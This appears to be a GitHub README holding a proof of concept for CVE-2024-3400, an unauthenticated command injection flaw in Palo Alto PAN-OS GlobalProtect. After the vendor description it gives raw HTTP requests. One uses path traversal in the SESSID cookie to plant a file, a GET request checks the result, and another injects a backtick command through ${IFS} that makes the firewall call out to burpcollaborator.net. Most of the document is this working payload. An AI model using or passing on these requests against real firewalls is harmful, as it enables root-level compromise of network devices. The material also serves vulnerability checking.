/CVE-2024-3400

CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect

MIT LicenseMIT

CVE-2024-3400

CVE-2024-3400 Palo Alto OS Command Injection

Vendor Description

A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.

Exploit

Kudos for watchtowr labs 🚀

Path traversal / Check

HTTP request:

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

poc.txt should be created under this path /var/appweb/sslvpndocs/global-protect/portal/images/poc.tx with root privilege.

If vulnerable you will recieve 403 when you access poc.txt instead of 404.

GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close

RCE Check

Telemetry must be enabled.

You can use Burp Collaborator for rce check

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

References